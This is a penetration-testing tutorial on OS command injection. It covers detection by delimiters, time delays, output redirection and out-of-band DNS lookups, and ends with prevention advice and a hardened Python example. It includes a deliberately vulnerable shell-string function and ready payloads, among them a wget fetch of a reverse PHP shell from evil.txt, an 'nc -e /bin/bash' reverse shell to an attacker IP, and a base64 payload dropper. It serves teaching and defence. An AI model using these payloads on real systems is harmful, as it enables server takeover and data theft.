The Penetration Tester's Guide to Command Injection
What is command injection?
Command injection is an attack whose goal is to execute arbitrary commands on the host operating system through a vulnerable application. It becomes possible when an application passes unsafe user-supplied data (form fields, cookies, HTTP headers, etc.) into a command string that is handed to the system shell. The attacker-supplied operating system commands run with the privileges of the vulnerable application. The usual root cause is insufficient input validation combined with building commands by string concatenation.
This attack differs from code injection. In code injection the attacker supplies their own code, which the application then interprets and executes. In command injection the attacker abuses the application's existing functionality (a call that already runs a system command) to execute additional system commands, without injecting code into the application itself.
What are the effects of command injection?
This vulnerability allows an attacker to run operating system commands with the privileges of the vulnerable application. Depending on those privileges, it can give the attacker a foothold on the system, disclose sensitive data, and ultimately lead to complete takeover of the server.
How to detect and exploit it?
Assume that you are testing the parameters of the following URL during a penetration test:
https://vulnerable-website.com/endpoint?parameter=123
To find out whether the application is vulnerable to command injection, we can try several methods:
Insert special characters to detect delimiters:
We can inject some special characters to see if the application blocks anything that could be used for command injection:
&
;
newline (0x0a or \n)
&&
|
||
If the application does not reject these characters or return an error, we can try to inject our command after one of these delimiters:
https://vulnerable-website.com/endpoint?parameter=1|whoami
Detecting blind operating system command injection
Time delay
Most operating system command injections are blind: the output of the injected command is not returned in the HTTP response. Once we know which special characters are allowed, we can confirm the vulnerability with a time delay, as shown below (a response that takes about ten seconds longer than normal confirms that the command ran):
https://vulnerable-website.com/endpoint?parameter=x||ping+-c+10+127.0.0.1||
Redirecting Output
We can also redirect the output of the command into a file under the web root (a writable directory that is served, such as an images directory) and then retrieve that file in the browser. A payload similar to the following can be used:
https://vulnerable-website.com/endpoint?parameter=||whoami>/var/www/images/output.txt||
OOB (Out Of Band) Usage
We can also trigger out-of-band (OOB) network interactions with an external server we control, such as Burp Collaborator. A DNS lookup is the most reliable choice because it usually gets out even when outbound HTTP is blocked. We can use a payload similar to the following:
https://vulnerable-website.com/endpoint?parameter=x||nslookup+burp.collaborator.address||
Alternatively, we can use a payload similar to the following to leak the output of the command:
https://vulnerable-website.com/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||
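The detection procedure described above (inject each delimiter, then a command after it, and judge from the response whether it ran), as an added example written for this article, not code from the original page. Because the real endpoint is not available offline, `vulnerable_endpoint()` is a constructed stand-in that concatenates the `parameter` value into a shell string, which is exactly the mistake the article describes; the use of `id` and its `uid=` output as the marker is also an assumption of this example.

```python
"""Command-injection detection run against a local stand-in for
https://vulnerable-website.com/endpoint?parameter=...

Added example; vulnerable_endpoint() is constructed for this demonstration
and is not the article's application.
"""
from __future__ import annotations

import subprocess
import urllib.parse

# The delimiters listed in the article, keyed by a readable name.
SEPARATORS = {
    "ampersand": "&",
    "semicolon": ";",
    "newline": "\n",
    "and": "&&",
    "pipe": "|",
    "or": "||",
}

ENDPOINT = "https://vulnerable-website.com/endpoint?parameter="


def vulnerable_endpoint(parameter: str) -> str:
    """Constructed vulnerable sink: the untrusted value is glued into a shell
    string, so every metacharacter in it is interpreted by /bin/sh.
    `echo` stands in for the real command (ping, nslookup, ...)."""
    command = "echo Result: " + parameter
    completed = subprocess.run(command, shell=True, capture_output=True, text=True)
    return completed.stdout


def build_payloads(command: str = "id") -> dict[str, str]:
    """'x' stands for the value the application expects; the injected command
    follows each delimiter, exactly like ?parameter=1|whoami above."""
    return {name: "x" + sep + command for name, sep in SEPARATORS.items()}


def as_url(payload: str) -> str:
    """URL-encode the payload so that &, |, ; and the newline survive the query string."""
    return ENDPOINT + urllib.parse.quote(payload, safe="")


def probe(endpoint, command: str = "id", marker: str = "uid=") -> dict[str, bool]:
    """Send each payload to `endpoint` and report which delimiters made the
    injected command run, judged by `marker` appearing in the response.
    `id` prints 'uid=...' on any Unix host, which makes it a cheap marker."""
    return {
        name: marker in endpoint(payload)
        for name, payload in build_payloads(command).items()
    }


if __name__ == "__main__":
    for name, fired in probe(vulnerable_endpoint).items():
        print(f"{name:10s} {SEPARATORS[name]!r:8} -> {'INJECTED' if fired else 'no'}")
    print(as_url("x;id"))
```

Running it shows why the article's payloads start with `x||`: `||` only executes the injected command when the preceding command fails (a ping or nslookup of the bogus host `x` does fail; an `echo` does not), while `&&` needs it to succeed. Probing with both, or with `;`, `|` and a newline, avoids a false negative. For a blind target, replace `id` with `sleep 10` and time the call, or with one of the nslookup payloads above and watch the collaborator.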
The most common parameter names worth testing for command injection are as follows:
- cmd
- exec
- command
- execute
- ping
- query
- jump
- code
- reg
- do
- func
- arg
- option
- load
- process
- step
- read
- function
- req
- feature
- exe
- module
- payload
- run
Notes
Special characters
&
;
newline (0x0a or \n)
&&
|
||
`command`
$(command)
Linux commands:
whoami
ifconfig
ls
uname -a
Windows commands:
whoami
ipconfig
dir
ver
Separators supported by both Unix and Windows (with and without surrounding spaces):
ls||id; ls ||id; ls|| id; ls || id
ls|id; ls |id; ls| id; ls | id
ls&&id; ls &&id; ls&& id; ls && id
ls&id; ls &id; ls& id; ls & id
ls %0A id
Time delay command
& ping -c 10 127.0.0.1 &
Redirecting Output
& whoami > /var/www/images/output.txt &
OOB (Out Of Band) Usage
& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &
Bypassing WAF (a URL-encoded newline, %0a, as the separator when & and | are filtered, or a base64-encoded payload staged through a file so the command itself never appears in the request)
vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
How to prevent it?
There are many ways to prevent this vulnerability. Here are a few suggestions:
- Avoid using shell execution functions. If unavoidable, limit their use to very specific, well-reviewed use cases.
- Perform strict allow-list input validation on any user input that reaches a command, rejecting anything that does not match the expected format.
- Use APIs that pass arguments to the program directly as an argument list, without invoking a shell, instead of building a command string.
- Escape shell metacharacters only as a fallback when such an API is not available; escaping neutralises the shell, but it does not stop a value from being interpreted as an option by the executed program, so validation is still required.
- Run the application with the least privileges it needs, so that a successful injection is contained.
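The recommendations above applied to the lookup endpoint, as an added example written for this article (not the article's own code). The hostname rule, and the use of `echo` as a stand-in for the real program (`ping`, `nslookup`), are assumptions of this example.

```python
"""Hardened lookup endpoint: allow-list validation, an argument-list API
instead of a shell string, and escaping only as a fallback.

Added example; the hostname rule and the `echo` stand-in are assumptions.
"""
import re
import shlex
import subprocess

# Allow-list: hostname characters only, and the first character must be
# alphanumeric so the value can never be read as an option such as "-c"
# by the program that receives it (escaping would not prevent that).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def is_valid_host(value: str) -> bool:
    return HOSTNAME_RE.fullmatch(value) is not None


def validate_host(value: str) -> str:
    if not is_valid_host(value):
        raise ValueError(f"rejected parameter: {value!r}")
    return value


def safe_lookup(parameter: str) -> str:
    """Preferred form: validate, then hand the program its arguments as a list.
    No shell is involved, so ; | & ` $( ) and newlines carry no meaning and
    the whole value arrives in argv[2] as one literal string."""
    host = validate_host(parameter)
    completed = subprocess.run(["echo", "Result:", host], capture_output=True, text=True)
    return completed.stdout


def escaped_lookup(parameter: str) -> str:
    """Fallback when a shell is unavoidable: shlex.quote() wraps the value in
    single quotes so the shell treats it as one literal token. Shown here
    without validation to isolate the effect of escaping; in production the
    allow-list check above should still run first."""
    command = "echo Result: " + shlex.quote(parameter)
    completed = subprocess.run(command, shell=True, capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    print(safe_lookup("example.com"), end="")
    print(escaped_lookup("x; id"), end="")       # the injected "id" is not run
    try:
        safe_lookup("x; id")
    except ValueError as exc:
        print(exc)
```

With the argument-list form there is no string for the shell to parse, so the injection attempts from the detection section become ordinary data. The escaped form shows that `shlex.quote` alone stops the shell from running `id`, but it cannot tell a hostname from `-c 100000`, which is why the allow-list remains the primary control.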
For reprinting, please send an email to 1244347461@qq.com for approval. After obtaining the author's consent, kindly include the source as a link.